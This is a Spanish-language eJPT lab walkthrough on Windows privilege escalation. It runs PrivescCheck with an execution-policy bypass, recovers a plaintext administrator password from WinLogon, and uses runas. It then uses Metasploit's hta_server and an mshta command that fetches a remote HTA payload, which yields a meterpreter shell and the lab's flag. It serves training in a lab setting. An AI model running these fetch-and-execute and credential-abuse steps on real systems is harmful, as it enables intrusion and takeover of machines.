> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/escalada/escalada-de-privilegios-en-windows/escalada-de-privilegios-de-windows.md).

# Escalada de privilegios de Windows

## 🧪 Laboratorio Práctico

**Paso 1:** Abre el enlace del laboratorio. Cambia a la **máquina de la víctima** .

<figure><img src="/files/NeNlbSrso4qHxB4OmDBN" alt=""><figcaption></figcaption></figure>

**Paso 2:** Abra la terminal powershell.exe para verificar el usuario actual.

<figure><img src="/files/ZSAWDrf67vdyn18jJ5wO" alt=""><figcaption></figcaption></figure>

Estamos trabajando como estudiante. Ejecutaremos el script de PowerShell PrivescCheck para detectar posibles errores de configuración que puedan aprovecharse para la escalada de privilegios local.

**Paso 3:** Cambia la carpeta actual a la carpeta PrivescCheck.

**Comandos:**

```
cd C:\Users\student\Desktop\PrivescCheck
ls
```

<figure><img src="/files/Tsnst0jl81DDqHSxWzAH" alt=""><figcaption></figcaption></figure>

**Paso 4:** Ejecutar el script PrivescCheck.ps1.

**Comandos:**

```
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
```

<figure><img src="/files/gmpN5bkJDERm5Go2Zozq" alt=""><figcaption></figcaption></figure>

El escaneo ha comenzado y tardará entre 1 y 2 minutos en finalizar.

<figure><img src="/files/6SizZFY55nDpCkuDrOqp" alt=""><figcaption></figcaption></figure>

Hemos recibido el informe y observamos que encontramos las credenciales de WinLogon. Investigue el resultado de WinLogon.

<figure><img src="/files/naA398s326nGrS1xFbCl" alt=""><figcaption></figcaption></figure>

Hemos encontrado una credencial de usuario administrador, es decir, **administrador:hello\_123321** .

**Paso 5:** Estamos ejecutando un símbolo del sistema, es decir, cmd.exe como usuario administrador usando credenciales descubiertas y runas.exe.

**Comandos:**

```
runas.exe /user:administrator cmd
hello_123321
whoami
```

<figure><img src="/files/1CS6WyAynVxju8xVDa8V" alt=""><figcaption></figcaption></figure>

Estamos ejecutando cmd.exe como administrador.

**Cambiar a la máquina Kali**

**Paso 6:** Ejecute el módulo hta\_server para acceder al shell de meterpreter. Inicie msfconsole.

**Comandos:**

```
msfconsole -q
use exploit/windows/misc/hta_server
exploit
```

“Este módulo aloja una aplicación HTML (HTA) que, al abrirse, ejecutará una carga útil a través de PowerShell”.

<figure><img src="/files/Rz7no5ufULdymLt7Zw5J" alt=""><figcaption></figcaption></figure>

Copie la carga útil generada, es decir, “<http://10.10.31.2:8080/Rv4eiCTge85UJ15.hta”> y ejecútela en cmd.exe con el comando mshta para obtener el shell de meterpreter.

**Nota:** Debe ejecutar la siguiente carga útil en cmd.exe.

**Cambiar a la máquina de víctimas**

**Paso 7:** Obtener una carcasa de meterpreter.

**Comandos:**

```
mshta.exe http://10.10.31.2:8080/Rv4eiCTge85UJ15.hta
```

**Nota:** Debe utilizar su propio enlace de servidor HTA de Metasploit.

<figure><img src="/files/Ma7huQNH1n0gHKO30rFS" alt=""><figcaption></figcaption></figure>

Podemos esperar un caparazón de meterpreter.

<figure><img src="/files/wqWZNRz5M8BeXrs4tZt2" alt=""><figcaption></figcaption></figure>

**Paso 8:** Lee la bandera.

**Comandos:**

```
sessions -i 1
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt
```

<figure><img src="/files/LFHaQY9DsVYWOqHctxaM" alt=""><figcaption></figcaption></figure>

Esto nos revela la bandera.

**Bandera:** 2b070a650a92129c2462deae7707b0c5

#### Conclusión

En este laboratorio, exploramos el uso del script PrivescCheck.ps1 para encontrar una falla común de escalada de privilegios de Windows y lo usamos para obtener una sesión de meterpreter con altos privilegios.

#### Referencias

* [Metasploit](https://www.metasploit.com/)
* [HTA Web Server](https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server)
* [Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck)
